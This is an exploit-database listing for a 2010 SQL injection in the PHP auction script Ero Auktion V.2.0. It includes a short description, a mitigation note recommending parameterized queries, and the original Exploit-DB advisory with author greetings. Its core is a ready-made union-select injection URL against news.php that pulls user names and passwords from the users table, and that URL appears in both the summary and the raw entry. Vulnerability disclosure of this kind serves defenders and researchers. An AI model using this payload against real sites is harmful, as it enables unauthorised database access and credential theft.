header-logo
Suggest Exploit
vendor:
Ero Auktion
by:
Easy Laster
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Ero Auktion
Affected Version From: V.2.0
Affected Version To: V.2.0
Patch Exists: N/A
Related CWE: N/A
CPE: a:eroproject:ero_auktion
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2010

Ero Auktion V.2.0 SQL Injection news.php

An SQL injection vulnerability exists in Ero Auktion V.2.0, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'news.php' script. An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious SQL statements to the vulnerable application. This can be done by appending the malicious SQL statement to the 'id' parameter in the 'news.php' script, such as 'www.site.com/flashauktion/news.php?id=11111111+union+select+1,2,concat%28name,0x3a,password%29,4,5+from+users'.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

----------------------------Information----------------------------------------
+Autor : Easy Laster
+Date   : 21.10.2010
+Script  : Ero Auktion V.2.0 SQL Injection news.php
+Download : -----
+Price : 34,90€
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor.
--------------------------------------------------------------------------------
 ___ ___ ___ ___                     _ _                         _         _
| | |   |   | | |___ ___ ___ ___ ___|_| |_ _ _ ___ ___ ___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _|  _| |  _| | |___| . |  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|_| |_|_| |_  |   |  _|_| |___|_| |___|___|_|
                                          |___|   |_|         |___|
--------------------------------------------------------------------------------
+Vulnerability : www.Site.com/news.php?id=[SQL]
+Exploitable   : www.site.com/flashauktion/news.php?id=11111111+union+select+1,
2,concat%28name,0x3a,password%29,4,5+from+users
--------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR